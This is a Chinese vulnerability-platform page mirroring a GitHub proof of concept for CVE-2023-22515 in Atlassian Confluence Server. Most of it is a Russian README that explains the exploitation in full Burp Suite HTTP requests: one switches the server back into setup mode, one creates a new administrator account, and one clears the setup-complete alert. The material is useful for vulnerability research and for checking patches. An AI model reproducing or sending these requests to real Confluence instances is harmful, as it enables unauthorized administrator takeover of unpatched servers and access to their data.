漏洞平台

POC详情： ba4b7673fa02f54620b7877f6b39ee02870b29b8

来源

https://github.com/xorbbo/cve-2023-22515

关联漏洞

标题： Atlassian Confluence Server 安全漏洞 (CVE-2023-22515)
描述：Atlassian Confluence Server是澳大利亚Atlassian公司的一套具有企业知识管理功能，并支持用于构建企业WiKi的协同软件的服务器版本。 Atlassian Confluence Server存在安全漏洞，该漏洞源于外部攻击者可能利用可公开访问的Confluence Data Center和Confluence Serve，用未知的漏洞来创建Confluence 管理员帐户并访问 Confluence 实例。

描述

NSE script to check if app is vulnerable to cve-2023-22515

介绍

# CVE-2023-22515

Тут описана логика эксплуатации уязвимости, через Burp Suite.

Для эксплуатации необходимо изменить значение атрибута `bootstrapStatusProvider.applicationConfig.setupComplete` на  `false`, то есть выполнить запрос:

### Ручка перевода Confluence в режим настройки:
```burp
GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false HTTP/1.1
Host: 192.168.1.37:8090
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: JSESSIONID=77149CD086735B59F8F7FBE253D563AC
Upgrade-Insecure-Requests: 1
Priority: u=1
```

Это позволяет нам инициировать начальную настройку сервера, что в свою очередь даёт нам возможность создавать учётные записи с правами администратора.


### Пэйлоад на создание учётной записи с правами администратора:
```burp
POST /setup/setupadministrator.action HTTP/1.1
Host: 192.168.1.37:8090
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: */*
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
Priority: u=1
X-Atlassian-Token: no-check
Content-Length: 137
Content-Type: application/x-www-form-urlencoded

username=not_xorbbo&fullName=NotXorbbo&email=not.xorbbo%40localhost&password=PasswordAnim3&confirm=PasswordAnim3&setup-next-button=Next
```


После эксплуатации уязвимости рекомендуется сделать POST-запрос для отключения алерта о завершении конфигурации Confluence'а:
### Отключение алерта:
```
POST /setup/finishsetup.action HTTP/1.1
Host: 192.168.1.37:8090
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: */*
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
Priority: u=1
X-Atlassian-Token: no-check
Referer: http://192.168.1.37:8090/setup/setupadministrator.action
```

文件快照


 [4.0K]  /data/pocs/ba4b7673fa02f54620b7877f6b39ee02870b29b8
├── [1.2K]  cve-2023-22515.nse
└── [2.6K]  README.md

0 directories, 2 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。